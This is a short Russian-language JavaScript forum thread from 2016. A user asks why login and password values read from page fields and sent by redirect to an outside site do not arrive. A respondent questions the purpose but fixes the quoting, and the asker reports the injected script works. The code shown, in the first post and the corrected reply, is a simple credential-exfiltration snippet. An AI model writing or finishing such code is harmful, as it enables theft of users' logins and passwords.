Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 12.07.2016, 17:06
Интересующийся
Отправить личное сообщение для Frost-56rus Посмотреть профиль Найти все сообщения от Frost-56rus
 
Регистрация: 21.02.2015
Сообщений: 22

Не передаются переменные на сторонний сайт
scr.innerHTML = 'function First() { 
var login = document.getElementById("quick_email").value; 
var parol = document.getElementById("quick_pass").value; 

document.location.href="http://google.com/?login='+login+'&parol='+parol'";
}';

В чем беда?
Ответить с цитированием
  #2 (permalink)  
Старый 12.07.2016, 17:08
Аватар для Botik21
Аспирант
Отправить личное сообщение для Botik21 Посмотреть профиль Найти все сообщения от Botik21
 
Регистрация: 01.06.2016
Сообщений: 87

А что это такое странное вы делаете?
А вообще тут в кавычках косяки и должно быть как минимум:
document.location.href = "http://google.com/?login=" + login + "&parol=" + parol;

Последний раз редактировалось Botik21, 12.07.2016 в 17:12.
Ответить с цитированием
  #3 (permalink)  
Старый 12.07.2016, 17:22
Интересующийся
Отправить личное сообщение для Frost-56rus Посмотреть профиль Найти все сообщения от Frost-56rus
 
Регистрация: 21.02.2015
Сообщений: 22

Сообщение от Botik21 Посмотреть сообщение
А что это такое странное вы делаете?
А вообще тут в кавычках косяки и должно быть как минимум:
document.location.href = "http://google.com/?login=" + login + "&parol=" + parol;
Да, в кавычках косяк был, теперь раньше было +login+ так и редеректило, а сейчас вместо этого undefined
Ответить с цитированием
  #4 (permalink)  
Старый 12.07.2016, 17:29
Интересующийся
Отправить личное сообщение для Frost-56rus Посмотреть профиль Найти все сообщения от Frost-56rus
 
Регистрация: 21.02.2015
Сообщений: 22

Все, разобрался, дам поля вместо Name ID и все гуд.
Вопрос закрыт. Botik21 лайк.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IFRAME сторонний сайт andrys2007 Общие вопросы Javascript 3 29.09.2013 18:43
Пишем Iframe виджит для установки на сторонний сайт fiw Общие вопросы Javascript 0 04.04.2012 17:00
Не передаются переменные Ajax php форма Saimon7887 AJAX и COMET 1 16.01.2011 13:57
ajax запрос на сторонний сайт vanderv jQuery 2 15.01.2011 09:49
Наконец-то сайт открыт Илья Кантор Сайт Javascript.ru 9 06.08.2008 02:27